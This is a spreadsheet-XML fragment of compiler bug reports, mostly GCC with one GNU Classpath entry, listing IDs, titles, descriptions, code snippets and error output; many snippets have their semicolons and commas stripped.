    char  uint16_t_incorrect[sizeof(uint16_t) == 2]
    char   int32_t_incorrect[sizeof( int32_t) == 4]
    char  uint32_t_incorrect[sizeof(uint32_t) == 4]
}
============8&lt;================</t>
  </si>
  <si>
    <t>pgunreben</t>
  </si>
  <si>
    <t>GCC-50760</t>
  </si>
  <si>
    <t>[4.7 Regression] bootstrap failure</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 180099 gave
../../src-trunk/gcc/input.c: In function 'void dump_line_table_statistics()':
../../src-trunk/gcc/input.c:103:33: error: format '%lu' expects argument of type 'long unsigned int' but argument 3 has type 'size_t {aka unsigned int}' [-Werror=format]
../../src-trunk/gcc/input.c:106:56: error: format '%lu' expects argument of type 'long unsigned int' but argument 3 has type 'size_t {aka unsigned int}' [-Werror=format]
cc1plus: all warnings being treated as errors
make[6]: *** [input.o] Error 1</t>
  </si>
  <si>
    <t>GCC-23626</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE after cunrolling</t>
  </si>
  <si>
    <t>The following C++ code currently fails at -O2 -fnon-call-exceptions:
extern C void abort ()
int a[3]
int f ()
{
  int sum = 0
  try
  {
    for (int i = 0 i &lt; 3 ++i)
      sum += a[i]
  }
  catch (...)
  {
    abort ()
  }
  return sum
}
I think someone forgets to cleanup the eh regions after unrolling:
t.cc: In function â€˜int f()â€™:
t.cc:2: error: BB 0 last statement has incorrectly set region
t.cc:2: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-45172</t>
  </si>
  <si>
    <t>[4.6 Regression] internal compiler error: verify_flow_info failed</t>
  </si>
  <si>
    <t>recent trunk (4.6.0 20100803 (experimental) [trunk revision 162839]) fails with:
&gt; gfortran -c  -fopenmp -O1 -fexceptions bug.f90
bug.f90: In function â€˜dbcsr_mult_m_e_eâ€™:
bug.f90:1:0: error: verify_flow_info: Duplicate edge 28-&gt;29
bug.f90:1:0: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
&gt; cat bug.f90
  SUBROUTINE dbcsr_mult_m_e_e ( )
    LOGICAL PARAMETER   :: use_combined_types = .FALSE.
    INTEGER ALLOCATABLE DIMENSION(: :) ::  right_index_sr
    INTEGER ALLOCATABLE DIMENSION(: : :) ::  my_sizes
    INTEGER ALLOCATABLE  DIMENSION(: : : :) :: all_sizes
    ALLOCATE (all_sizes(4 LBOUND(my_sizes2):UBOUND(my_sizes2) &amp;
              LBOUND(my_sizes3):UBOUND(my_sizes3) 0:numnodes-1))
          IF (use_combined_types) THEN
             CALL mp_waitall (right_index_sr)
          ENDIF
          DO ki = 0 min_nimages-1
!$omp parallel default (none) &amp;
!$omp reduction (+: flop_single t_all t_dgemm)
!$omp end parallel
          ENDDO
       checksum = dbcsr_checksum (product_matrix error)
  END SUBROUTINE dbcsr_mult_m_e_e
older gcc (gcc-4_5-branch revision 162409) is fine.</t>
  </si>
  <si>
    <t>GCC-4117</t>
  </si>
  <si>
    <t>Got a internal error when make php</t>
  </si>
  <si>
    <t xml:space="preserve">	When make php-4.0.6 as an Apache module got segmentation fault.
	It seems enabling multi-bite string feature of PHP4 causes the problem.
Release:
3.0.1
Environment:
System: Linux qizhi.homeip.net 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0.1/configure --enable-shared --enable-threads
How-To-Repeat:
	tar xzvf php-4.0.6.tar.gz
	cd php-4.0.6
	./configure --with-apxs=/usr/local/apache/bin/apxs --with-mysql=/usr/local/mysql --with-pgsql=/usr/local/pgsql --with-pspell --enable-mbstring --enable-memory-limit --enable-trans-sid
	make
	... ...
	mbfilter.c:129: Internal error: Segmentation fault
	Please submit a full bug report
	with preprocessed source if appropriate.
	See  for instructions.
	make[3]: *** [mbfilter.lo] Error 1
	make[3]: Leaving directory `/usr/local/src/temp/php-4.0.6/ext/mbstring'
	make[2]: *** [all-recursive] Error 1
	make[2]: Leaving directory `/usr/local/src/temp/php-4.0.6/ext/mbstring'
	make[1]: *** [all-recursive] Error 1
	make[1]: Leaving directory `/usr/local/src/temp/php-4.0.6/ext'
	make: *** [all-recursive] Error 1
	----preprocessor output for mbfilter.c --- begin ---</t>
  </si>
  <si>
    <t>qizhi</t>
  </si>
  <si>
    <t>GCC-26127</t>
  </si>
  <si>
    <t>tr1/hashtable compile errors</t>
  </si>
  <si>
    <t>There are a couple of minor errors in tr1/hashtable that cause some of the rarely-instantiated members defined in TR1 (http://open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1836.pdf) not to compile eg:
std::tr1::unordered_set s
s.key_eq()    // Not declared:
// error: 'class std::tr1::unordered_set
// std::equal_to std::allocator false&gt;' has no member
// named 'key_eq'
// (The function simply isn't there.)
s.bucket(42)  // Implementation fails to compile:
// /opt/gcc-svn/trunk/lib/gcc/i686-pc-linux-gnu/4.2.0/../../../../include/c++/4.2.0/tr1/hashtable:1099: 
// error: no matching function for call to 'std::tr1::hashtable&lt;int int
// std::allocator Internal::identity std::equal_to
// std::tr1::hash Internal::mod_range_hashing
// Internal::default_ranged_hash Internal::prime_rehash_policy false false
// true&gt;::bucket_index(const int&amp;  const size_t&amp;) const
// (Missing parentheses on function call.)
s.max_load_factor()
// /opt/gcc-svn/trunk/lib/gcc/i686-pc-linux-gnu/4.2.0/../../../../include/c++/4.2.0/tr1/hashtable:656: error: base operand of '-&gt;' has non-pointer type 'const Internal::prime_rehash_policy'
// (member access using -&gt; instead of .)
The above applies to the 4.0 branch and current trunk. (Line numbers above are from trunk.)
Patches to follow.</t>
  </si>
  <si>
    <t>GCC-270</t>
  </si>
  <si>
    <t>[x86 Linux-&gt;m68k] gcc 2.95.2  -mpcrel switch does not work for m68k cross-compiler</t>
  </si>
  <si>
    <t>When using the -mpcrel switch as documented an invalid switch
error -pcrel is returned.
Release:
gcc 2.95.2
Environment:
Cross Compiler configured as m68k-motorola-coff
target on linux-pc host.
How-To-Repeat:
The following is the command options used in cc1 pass
/tools/gnu-compilers/gcc-2.95.2/m68k-motorola-coff/gcc/cc1 /tmp/cc6O0tcA.i -quiet -dumpbase diag_task.c -mc68000 -msoft-float -m68020 -mpcrel -g -O0 -version -fno-builtin -ffreestanding -o /tmp/ccoljLZ3.s
cc1: Invalid option `pcrel'
GNU C version 2.95.2 19991024 (release) (m68k-motorola-coff) compiled by GNU C version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release).</t>
  </si>
  <si>
    <t>mark_golden</t>
  </si>
  <si>
    <t>GCC-67478</t>
  </si>
  <si>
    <t>gcc-5.1.0/gcc-5.2.0 undefined symbol std::__once_callable in AIX 6.1</t>
  </si>
  <si>
    <t>Created attachment 36299
libstdc++ config.log
When using std::call_once there are two undefined symbols in AIX 6.1 using gcc-5.1.0 or gcc-5.2.0:
c++ -maix64 -pthread -std=c++11 -c start.cxx
c++ -maix64 -pthread -lstdc++ start.o -o start
ld: 0711-317 ERROR: Undefined symbol: std::__once_callable
ld: 0711-317 ERROR: Undefined symbol: std::__once_call
gcc 5.2.0 configured with:
/builds/gbgbuild/bld/gcc/gcc-5.2.0/configure --prefix=/usr/local/gcc-5.2.0 --enable-languages=cc++ --with-as=/usr/bin/as --with-ld=/usr/bin/ld --enable-threads --enable-cxa_atexit --enable-libstdcxx-threads --enable-tls --with-gmp=/usr/local/lib32-static --with-mpfr=/usr/local/lib32-static --with-mpc=/usr/local/lib32-static
gcc-5.1.0 produce the same output. This was configured without the parameters --enable-libstdcxx-threads --enable-tls.
The symbols are present in libstdc++.so.6 marked with L meaning Global thread-local symbol (TLS)
The source is:
#include 
#include 
void print_once()
{
	static int cnt = 0
	static std::once_flag flag
	std::call_once(
		flag
		[&amp;]()
		{
			printf(%d\n cnt)
			cnt++
		} )
}
int main( void )
{
	print_once()
	print_once()
	return 0
}</t>
  </si>
  <si>
    <t>tgard</t>
  </si>
  <si>
    <t>GCC-72713</t>
  </si>
  <si>
    <t>boehm-gc/pthread_support.c:687: suspicious expression ?</t>
  </si>
  <si>
    <t xml:space="preserve">boehm-gc/pthread_support.c:687]: (style) Boolean result is used in bitwise operation. Clarify expression with parentheses.
Source code is
     if (marker_sp[i] &gt; lo 
Maybe better code
     if (marker_sp[i] &gt; lo </t>
  </si>
  <si>
    <t>GCC-12971</t>
  </si>
  <si>
    <t>Resolution of DR 328 [WP] still unimplemented</t>
  </si>
  <si>
    <t>Basically money_put::do_put(... long double) must use %.0Lf not %.01f (as
written in the standard) nor %.01Lf as currently in v3: passing a long double
with fractional part &gt;= .5 constitutes a good testcase.</t>
  </si>
  <si>
    <t>GCC-30015</t>
  </si>
  <si>
    <t>[4.1 only] Intrinsic date_and_time can go back in time</t>
  </si>
  <si>
    <t>In date_and_time.c 'time' is called. If the routine then goes on to call 'gettimeofday' it extracts the milliseconds value from the 'gettimeofday' call but gets the seconds value from the old call to 'time'. This can result in consecutive times of (say)
  2006   11   29   12    4   34  999
  2006   11   29   12    4   34    0
being generated. Notice that the seconds in the later call have not 'ticked over' 
because they refer to the earlier time value accessed by 'time' while the milliseconds refer to the correct value accessed by gettimeofday. 
Here is our test code:
!!!!!!!!!!!!!!!!!!!! Test program for DATE_AND_TIME
    PROGRAM DATE_AND_TIME_TEST
! .. Implicit None Statement ..
       IMPLICIT NONE
! .. Parameters ..
       INTEGER PARAMETER :: NOUT = 6
       INTEGER PARAMETER :: WP = KIND(0.0D0)
! .. Non-Generic Interface Blocks ..
       INTERFACE
          FUNCTION ORDER_TIME(ITIME1ITIME2)
! .. Function Return Value ..
             INTEGER :: ORDER_TIME
! .. Array Arguments ..
             INTEGER INTENT (IN) :: ITIME1(7) ITIME2(7)
          END FUNCTION ORDER_TIME
       END INTERFACE
! .. Local Scalars ..
       REAL (KIND=WP) :: E ETOL EXPE T
       INTEGER :: I N NFAILS
       LOGICAL :: PASS
! .. Local Arrays ..
       INTEGER :: DATE_TIME(8) ITIME1(7) ITIME2(7)
! .. Intrinsic Functions ..
       INTRINSIC ABS DATE_AND_TIME KIND MIN
! .. Executable Statements ..
       CONTINUE
       PASS = .TRUE.
       EXPE = 2.718281828E0_WP
!      Make up to 10000 calls of DATE_AND_TIME and check that they return
!      monotonic non-decreasing times by calling ORDER_TIME.
       NFAILS = 0
       CALL DATE_AND_TIME(VALUES=DATE_TIME)
       ITIME2(1:3) = DATE_TIME(1:3)
       ITIME2(4:7) = DATE_TIME(5:8)
!      Output start time.
       WRITE (NOUTFMT=99991) ITIME2(1:7)
       I = 2
       DO
!         Save the old time in ITIME1.
          ITIME1(1:7) = ITIME2(1:7)
!         Delay a bit by computing e.
          ETOL = 0.001_WP
          E = 1.0E0_WP
          T = 1.0E0_WP
          DO N = 1 100000 - MIN(I6)
             T = T/N
             E = E + T
          END DO
!         This test is just so that E gets used and the loop
!         above isn't optimised away.
          IF (ABS(E-EXPE)&gt;ETOL) THEN
             IF (PASS) THEN
                PASS = .FALSE.
                WRITE (NOUTFMT=99999) E EXPE
             END IF
          END IF
!         Get the new time in ITIME2.
          CALL DATE_AND_TIME(VALUES=DATE_TIME)
          ITIME2(1:3) = DATE_TIME(1:3)
          ITIME2(4:7) = DATE_TIME(5:8)
          IF (ORDER_TIME(ITIME1ITIME2)==1 .AND. NFAILS&lt;5) THEN
             NFAILS = NFAILS + 1
             PASS = .FALSE.
             WRITE (NOUTFMT=99998) ITIME1 ITIME2
          END IF
!         Continue round the loop up to at most 10000 times unless at
!         least two different times have been found and we've done
!         the loop at least 1000 times.
          IF ((ORDER_TIME(ITIME1ITIME2)/=-1 .AND. I&lt;10000) .OR. I&lt;1000) THEN
             I = I + 1
          ELSE
             EXIT
          END IF
       END DO
!      Make one final check to ensure that all the times in the loop
!      above were not identical.
!      Output end time.
       WRITE (NOUTFMT=99990) ITIME2(1:7)
       IF (ORDER_TIME(ITIME1ITIME2)/=-1 .AND. NFAILS&lt;5) THEN
          PASS = .FALSE.
          WRITE (NOUTFMT=99997) ITIME1 ITIME2
       END IF
       IF (PASS) THEN
          WRITE (NOUTFMT=99996)
       ELSE
          WRITE (NOUTFMT=99995)
       END IF
99999  FORMAT (1X/1X'Computed e as '1PE13.5' instead of 'E13.5)
99998  FORMAT (1X/1X'Two consecutive calls of DATE_AND_TIME returned:' &amp;
          2(/1X7I5)/2X &amp;
          '- the first should be not later than the second but is.')
99997  FORMAT (1X/1X'Two calls of DATE_AND_TIME returned:'2(/1X7I5)/2X &amp;
          '- the first should be earlier than the second but is not.')
99996  FORMAT (1X/1X'TEST OF DATE_AND_TIME PASSED OK')
99995  FORMAT (1X/1X'TEST OF DATE_AND_TIME FAILS')
99991  FORMAT (1X'*** Started at'7I5)
99990  FORMAT (1X/1X'***** Ended at'7I5)
    END PROGRAM DATE_AND_TIME_TEST
    FUNCTION ORDER_TIME(ITIME1ITIME2)
! .. Implicit None Statement ..
       IMPLICIT NONE
! .. Function Return Value ..
       INTEGER :: ORDER_TIME
! .. Parameters ..
       INTEGER PARAMETER :: WP = KIND(0.0D0)
! .. Array Arguments ..
       INTEGER INTENT (IN) :: ITIME1(7) ITIME2(7)
! .. Local Scalars ..
       INTEGER :: I
! .. Intrinsic Functions ..
       INTRINSIC KIND
! .. Executable Statements ..
       CONTINUE
!      Compare the integer array format times.
       I = 1
       DO
          IF (ITIME1(I)==ITIME2(I) .AND. I&lt;7) THEN
             I = I + 1
          ELSE
             EXIT
          END IF
       END DO
       IF (ITIME1(I)&lt;ITIME2(I)) THEN
          ORDER_TIME = -1
       ELSE IF (ITIME1(I)==ITIME2(I)) THEN
          ORDER_TIME = 0
       ELSE
          ORDER_TIME = 1
       END IF
       RETURN
    END FUNCTION ORDER_TIME
!!!!!!!!!!!!!!!!!!!! End of test program for DATE_AND_TIME
The fix to date_and_time is pretty obvious. Here's how we made the relevant section of the code work:
/* Some unchanged date_and_time.c code above here */
#ifndef HAVE_NO_DATE_TIME
  time_t lt
  struct tm local_time
  struct tm UTC_time
  lt = time (NULL)
  if (lt != (time_t) -1)
    {
#if HAVE_GETTIMEOFDAY
      {
        struct timeval tp
#if GETTIMEOFDAY_ONE_ARGUMENT
        if (!gettimeofday (&amp;tp))
#else
#if HAVE_STRUCT_TIMEZONE
          struct timezone tzp
        /* Some systems such as HP-UX do have struct timezone but
           gettimeofday takes void* as the 2nd arg.  However the
           effect of passing anything other than a null pointer is
           unspecified on HP-UX.  Configure checks if gettimeofday
           actually fails with a non-NULL arg and pretends that
           struct timezone is missing if it does fail.  */
        if (!gettimeofday (&amp;tp &amp;tzp))
#else
        if (!gettimeofday (&amp;tp (void *) 0))
#endif /* HAVE_STRUCT_TIMEZONE  */
#endif /* GETTIMEOFDAY_ONE_ARGUMENT  */
        /* All arguments can be derived from tp.  */
        lt = tp.tv_sec
        values[7] = tp.tv_usec / 1000
      }
#else
      {
        /* All arguments can be derived from lt.  */
        values[7] = 0
      }
#endif /* HAVE_GETTIMEOFDAY */
      local_time = *localtime (
      UTC_time = *gmtime (
      values[0] = 1900 + local_time.tm_year
      values[1] = 1 + local_time.tm_mon
      values[2] = local_time.tm_mday
      values[3] = (local_time.tm_min - UTC_time.tm_min +
                   60 * (local_time.tm_hour - UTC_time.tm_hour +
                         24 * (local_time.tm_yday - UTC_time.tm_yday)))
      values[4] = local_time.tm_hour
      values[5] = local_time.tm_min
      values[6] = local_time.tm_sec
#if HAVE_SNPRINTF
      if (__date)
/* Some unchanged date_and_time.c code below here */</t>
  </si>
  <si>
    <t>mathewc</t>
  </si>
  <si>
    <t>CLASSPATH-23557</t>
  </si>
  <si>
    <t>JComboBox under Graphics2D crashes VM and GTK</t>
  </si>
  <si>
    <t>Please compile and run the attached testcase with a Graphics2D-enabled
Classpath (./configure ... --enable-gtk-cairo) for an instant VM crash.
The partially created GTK window remains open and has to be killed via
the taskmanager. 
I tried classpath CVS 20050825 with jamvm 1.3.1. I can run a few of my
Graphics2D tests with this combination so basic Graphics2D support on
Swing is working. The testcase also works with the JComboBox not added
to the JFrame.
Note: Running the testcase with a 'normal' (non-Graphics2D Classpath) 
also shows some minor problems in JComboBox see follow-up PR.
I get the following shell output:
** ERROR **: file gnu_java_awt_peer_gtk_GdkGraphics2D.c: line 1257 (Java_gnu_jav
a_awt_peer_gtk_GdkGraphics2D_cairoDrawGlyphVector): assertion failed: (glyphs !=
 NULL)
aborting...
java.lang.InternalError
   at gnu.java.awt.peer.gtk.GdkGraphics2D.cairoDrawGlyphVector (Native Method)
   at gnu.java.awt.peer.gtk.GdkGraphics2D.drawGlyphVector (GdkGraphics2D.java:15
35)
   at gnu.java.awt.peer.gtk.GdkGraphics2D.drawString (GdkGraphics2D.java:1514)
   at gnu.java.awt.peer.gtk.GdkGraphics2D.drawString (GdkGraphics2D.java:1520)
   at javax.swing.plaf.basic.BasicButtonUI.paintText (BasicButtonUI.java:405)
   at javax.swing.plaf.basic.BasicButtonUI.paint (BasicButtonUI.java:287)
   at javax.swing.plaf.ComponentUI.update (ComponentUI.java:187)
   at javax.swing.JComponent.paintComponent (JComponent.java:1521)
   at javax.swing.JComponent.paint (JComponent.java:1454)
   at javax.swing.plaf.basic.BasicArrowButton.paint (BasicArrowButton.java:206)
   at java.awt.Container$GfxPaintVisitor.visit (Container.java:1765)
   at java.awt.Container.visitChild (Container.java:1569)
   at java.awt.Container.visitChildren (Container.java:1531)
   at java.awt.Container.paint (Container.java:764)
   at javax.swing.JComponent.paintChildren (JComponent.java:1498)
   at javax.swing.JComponent.paint (JComponent.java:1456)
   at java.awt.Container$GfxPaintVisitor.visit (Container.java:1765)
   at java.awt.Container.visitChild (Container.java:1569)
   at java.awt.Container.visitChildren (Container.java:1531)
   at java.awt.Container.paint (Container.java:764)
   at javax.swing.JComponent.paintChildren (JComponent.java:1498)
   at javax.swing.JComponent.paint (JComponent.java:1456)
   at java.awt.Container$GfxPaintVisitor.visit (Container.java:1765)
   at java.awt.Container.visitChild (Container.java:1569)
   at java.awt.Container.visitChildren (Container.java:1531)
   at java.awt.Container.paint (Container.java:764)
   at javax.swing.JComponent.paintChildren (JComponent.java:1498)
   at javax.swing.JComponent.paint (JComponent.java:1456)
   at java.awt.Container$GfxPaintVisitor.visit (Container.java:1765)
   at java.awt.Container.visitChild (Container.java:1569)
   at java.awt.Container.visitChildren (Container.java:1531)
   at java.awt.Container.paint (Container.java:764)
   at javax.swing.JComponent.paintChildren (JComponent.java:1498)
   at javax.swing.JComponent.paint (JComponent.java:1456)
   at java.awt.Container$GfxPaintVisitor.visit (Container.java:1765)
   at java.awt.Container.visitChild (Container.java:1569)
   at java.awt.Container.visitChildren (Container.java:1531)
   at java.awt.Container.paint (Container.java:764)
   at gnu.java.awt.peer.gtk.GtkComponentPeer.handleEvent (GtkComponentPeer.java:
313)
   at java.awt.Component.dispatchEventImpl (Component.java:4845)
   at java.awt.Container.dispatchEventImpl (Container.java:1592)
   at java.awt.Window.dispatchEventImpl (Window.java:628)
   at java.awt.Component.dispatchEvent (Component.java:2343)
   at java.awt.EventQueue.dispatchEvent (EventQueue.java:475)
   at java.awt.EventDispatchThread.run (EventDispatchThread.java:75)
Abort</t>
  </si>
  <si>
    <t>GCC-1731</t>
  </si>
  <si>
    <t>Internal compiler error 191 for inherited overloaded operator[] on NULL</t>
  </si>
  <si>
    <t>This is a refinement of my bug report c++/1065 of
december 2000: I have simplified the example program considerably.
The following C++ program causes an internal compiler error:
--------
class ShapeBase
{
  public:
    int }
}
class ShapeD1: public ShapeBase
{
}
int main( int argc char *argv[] )
{
    int n = (*(ShapeD1 *) 0)[0]
}                                                          ---------------
The fact that operator[] is inherited is important:
replacing ShapeD1 with ShapeBase in main() causes the
problem to go away.
It may be argued that the shown program is incorrect since it tries to use a NULL pointer but that's not a reason for an ICE. Moreover constant propagation by the
compiler can cause the same situation and hence the same ICE.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Debian linux 2.2
How-To-Repeat:
Compile the program above. No special flags are necessary.</t>
  </si>
  <si>
    <t>c.vanreeuwijk</t>
  </si>
  <si>
    <t>GCC-30505</t>
  </si>
  <si>
    <t>[4.2/4.3 regression] asm operand has impossible constraints.</t>
  </si>
  <si>
    <t>following testcase works fine with gcc-3.3/4.1:
typedef unsigned long long uint64
typedef unsigned uint32
uint64 dividend
uint32 divisor
uint64 quotient
uint32 remainder
void div643264( )
{
   uint32 hQuotient
   uint32 lQuotient
    __asm__(
      divl %5        \n\t
      movl %%eax %0 \n\t
      movl %4 %%eax \n\t
      divl %5
      : =&amp;rm (hQuotient) //0 r/m
        =a (lQuotient) //1 eax
        =d (remainder) //2 edx
      : 1 ((uint32)(dividend &gt;&gt; 32)) //3  eax
        g ((uint32)dividend) //4 r/m
        rm (divisor) //5 r/m
        2 (0) //6 edx
      : cc
   )
   quotient = (uint64)hQuotient &lt;&lt; 32 | lQuotient
}
e.g. 4.1 produces:
$ gcc div.c -fno-builtin -S -O2 &amp;&amp; cat div.s
div643264:
        pushl   %ebp
        movl    %esp %ebp
        subl    $12 %esp
        movl    dividend %ecx
        movl    %ebx (%esp)
        movl    dividend+4 %ebx
        movl    %esi 4(%esp)
        xorl    %esi %esi
        movl    %edi 8(%esp)
        movl    %esi %edx
        movl    4(%esp) %esi
        movl    %ebx %ecx
        xorl    %ebx %ebx
        movl    %ecx %eax
#APP
        divl divisor
        movl %eax %edi
        movl dividend %eax
        divl divisor
#NO_APP
        movl    %eax %ebx
        movl    %edi %eax
        movl    %edx remainder
        xorl    %edx %edx
        movl    %eax %edx
        movl    %ebx quotient
        movl    %edx quotient+4
        movl    (%esp) %ebx
        movl    $0 %eax
        movl    8(%esp) %edi
        leave
        ret
4.2 rejects such code.
div.c: In function div643264:
div.c:15: error: asm operand has impossible constraints</t>
  </si>
  <si>
    <t>GCC-13544</t>
  </si>
  <si>
    <t>[3.3.3 regression] conflicting types for enums in different scopes</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/225663]
this regression was introduced between 20031206 and 20031229 on the 3.3 branch.
the following example
enum Enum1
{
    None
}
namespace Test
{
    enum Enum2
    {
        None
    }
}
int main()
{
}
compiles withtest.cpp:11: error: conflicting types for `None'
test.cpp:4: error: previous declaration as `Enum1 None'</t>
  </si>
  <si>
    <t>GCC-41029</t>
  </si>
  <si>
    <t>ICE RTL check: expected code 'reg' have 'post_inc' in rhs_regno at rtl.h:1008</t>
  </si>
  <si>
    <t>Building sh4-unknown-linux-gnu target with --enable-checking=rtl yields.
gcc version 4.5.0 20090810 (experimental) [trunk revision 150633] (GCC)
../../../libiberty/floatformat.c: In function 'floatformat_from_double':
../../../libiberty/floatformat.c:683:1: internal compiler error: RTL check: expected code 'reg' have 'post_inc' in rhs_regno at rtl.h:1008
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-78588</t>
  </si>
  <si>
    <t>rtlanal.c:5210:38: runtime error: shift exponent 4294967295 is too large for 64-bit type 'long unsigned int'</t>
  </si>
  <si>
    <t>-fsanitize=undefined shows:
rtlanal.c:5210:38: runtime error: shift exponent 4294967295 is too large for 64-bit type 'long unsigned int'
Testing:
diff --git a/gcc/rtlanal.c b/gcc/rtlanal.c
index 4e4eb2e..918088a 100644
--- a/gcc/rtlanal.c
+++ b/gcc/rtlanal.c
@@ -52037 +52037 @@ num_sign_bit_copies1 (const_rtx x machine_mode mode const_rtx known_x
      safely compute the mask for this mode always return BITWIDTH.  */
   bitwidth = GET_MODE_PRECISION (mode)
-  if (bitwidth &gt; HOST_BITS_PER_WIDE_INT)
+  if (bitwidth == 0 || bitwidth &gt; HOST_BITS_PER_WIDE_INT)
     return 1
   nonzero = nonzero_bits (x mode)</t>
  </si>
  <si>
    <t>GCC-55590</t>
  </si>
  <si>
    <t>SRA still produces unnecessarily unaligned memory accesses</t>
  </si>
  <si>
    <t>SRA can still produce unaligned memory accesses which should be
aligned when it's basing its new scalar access on a MEM_REF buried
below COMPONENT_REFs or ARRAY_REFs.
Testcase 1:
/* { dg-do compile } */
/* { dg-options -O2 -mavx } */
#include 
struct S
{
  __m128 a b
}
struct T
{
  int a
  struct S s
}
void foo (struct T *p __m128 v)
{
  struct S s
  s = p-&gt;s
  s.b = _mm_add_ps(s.b v)
  p-&gt;s = s
}
/* { dg-final { scan-assembler-not vmovups } } */
on x86_64 compiles to
        vmovups 32(%rdi) %xmm1
        vaddps  %xmm0 %xmm1 %xmm0
        vmovups %xmm0 32(%rdi)
even though it should really be
        vaddps  32(%rdi) %xmm0 %xmm0
        vmovaps %xmm0 32(%rdi)
        ret
Testcase 2 (which describes why this should be fixed differently from
the recent IPA-SRA patch because of the variable array index):
/* { dg-do compile } */
/* { dg-options -O2 -mavx } */
#include 
struct S
{
  __m128 a b
}
struct T
{
  int a
  struct S s[8]
}
void foo (struct T *p int i __m128 v)
{
  struct S s
  s = p-&gt;s[i]
  s.b = _mm_add_ps(s.b v)
  p-&gt;s[i] = s
}
/* { dg-final { scan-assembler-not vmovups } } */
Compiles to
        movslq  %esi %rsi
        salq    $5 %rsi
        leaq    16(%rdi%rsi) %rax
        vmovups 16(%rax) %xmm1
        vaddps  %xmm0 %xmm1 %xmm0
        vmovups %xmm0 16(%rax)
        ret
when it should produce
        movslq  %esi %rsi
        salq    $5 %rsi
        leaq    16(%rdi%rsi) %rax
        vaddps  16(%rax) %xmm0 %xmm0
        vmovaps %xmm0 16(%rax)
        ret
I'm testing a patch.</t>
  </si>
  <si>
    <t>GCC-81970</t>
  </si>
  <si>
    <t>carchive gotools tests fail</t>
  </si>
  <si>
    <t>Following carchive gotools tests fail in gccgo testsuite:
FAIL: TestCgoCallbackGC
FAIL: TestInstall
FAIL: TestEarlySignalHandler
FAIL: TestSignalForwarding
FAIL: TestSignalForwardingExternal
FAIL: TestOsSignal
FAIL: TestSigaltstack
FAIL: TestPIE
The problem can be seen from the gotools log dump:
=== RUN   TestInstall
FAIL: TestInstall
        carchive_test.go:160: [gcc -fPIC -m64 -pthread
-fmessage-length=0
-fdebug-prefix-map=/tmp/go-build828417309=/tmp/go-build
-gno-record-gcc-switches -funwind-tables -I pkg/gccgo_linux_amd64_fPIC
-o ./testp1 main.c main_unix.c pkg/gccgo_linux_amd64_fPIC/liblibgo.a
-lgo]
        carchive_test.go:162:
pkg/gccgo_linux_amd64_fPIC/liblibgo.a(a.out.a.o): In function
`__go_init_main':
                /tmp/go-build/libgo/_obj/_cgo_gotypes.go:3: undefined
reference to `runtime.registerGCRoots'
                pkg/gccgo_linux_amd64_fPIC/liblibgo.a(a.out.a.o): In
function `__go_init_main':
/home/uros/gcc-build/gotools/carchive-test-dir/misc/cgo/testcarchive/src/libgo/libgo.go:18:
undefined reference to `runtime.writeBarrier'
/home/uros/gcc-build/gotools/carchive-test-dir/misc/cgo/testcarchive/src/libgo/libgo.go:18:
undefined reference to `runtime.writebarrierptr'
                pkg/gccgo_linux_amd64_fPIC/liblibgo.a(a.out.a.o): In
function `gostart':
/home/uros/gcc-build/x86_64-pc-linux-gnu/libgo/../../../git/gcc/libgo/runtime/go-libmain.c:111:
undefined reference to `runtime.schedinit'
/home/uros/gcc-build/x86_64-pc-linux-gnu/libgo/../../../git/gcc/libgo/runtime/go-libmain.c:112:
undefined reference to `runtime.main'
                collect2: error: ld returned 1 exit status
        carchive_test.go:163: exit status 1
The compiler in carchive_test.go:160 is called with the following command:
gcc -fPIC -m64 -pthread -fmessage-length=0
-fdebug-prefix-map=/tmp/go-build828417309=/tmp/go-build
-gno-record-gcc-switches -funwind-tables -I pkg/gccgo_linux_amd64_fPIC
-o ./testp1 main.c main_unix.c pkg/gccgo_linux_amd64_fPIC/liblibgo.a
-lgo
Please note that with -lgo the default system-wide libgo shared
library is linked in. However the test expects newly compiled library
from the libgo build directory. Manually adding correct -L path to the
above command builds functional executable.
 (The system-wide library in the above example is installed from the
current gcc-7 branch).</t>
  </si>
  <si>
    <t>GCC-23552</t>
  </si>
  <si>
    <t>FAIL: gfortran.dg/large_real_kind_1.f90</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc-3.3/objdir/gcc/testsuite/../gfortran -B/test/gn
u/gcc-3.3/objdir/gcc/testsuite/../ /test/gnu/gcc-3.3/gcc/gcc/testsuite/gfortran.
dg/large_real_kind_1.f90   -O0   -pedantic-errors  -L/test/gnu/gcc-3.3/objdir/hp
pa2.0w-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc-3.3/objdir/hppa2.0w-hp-h
pux11.11/./libiberty  -lm   -o ./large_real_kind_1.exe    (timeout = 300)
PASS: gfortran.dg/large_real_kind_1.f90  -O0  (test for excess errors)
Setting LD_LIBRARY_PATH to .:/test/gnu/gcc-3.3/objdir/hppa2.0w-hp-hpux11.11/./li
bgfortran/.libs:/test/gnu/gcc-3.3/objdir/gcc:.:/test/gnu/gcc-3.3/objdir/hppa2.0w
-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc-3.3/objdir/gcc
FAIL: gfortran.dg/large_real_kind_1.f90  -O0  execution test</t>
  </si>
  <si>
    <t>GCC-58958</t>
  </si>
  <si>
    <t>[4.9 Regression] Wrong aliasing info for variable index</t>
  </si>
  <si>
    <t>double a[10]
bool f(int n){
  a[3]=42
  __builtin_memset(
  return a[3]==42
}
is optimized to:
bool f(int) (int n)
{
  double * _4
  :
  a[3] = 4.2e+1
  _4 = 
  __builtin_memset (_4 3 8)
  return 1
}
This is the issue described here:
http://gcc.gnu.org/ml/gcc-patches/2013-10/msg02558.html
ao_ref_init_from_ptr_and_size makes an unsafe use of get_ref_base_and_extent. Maybe relying on get_addr_base_and_unit_offset would be better?
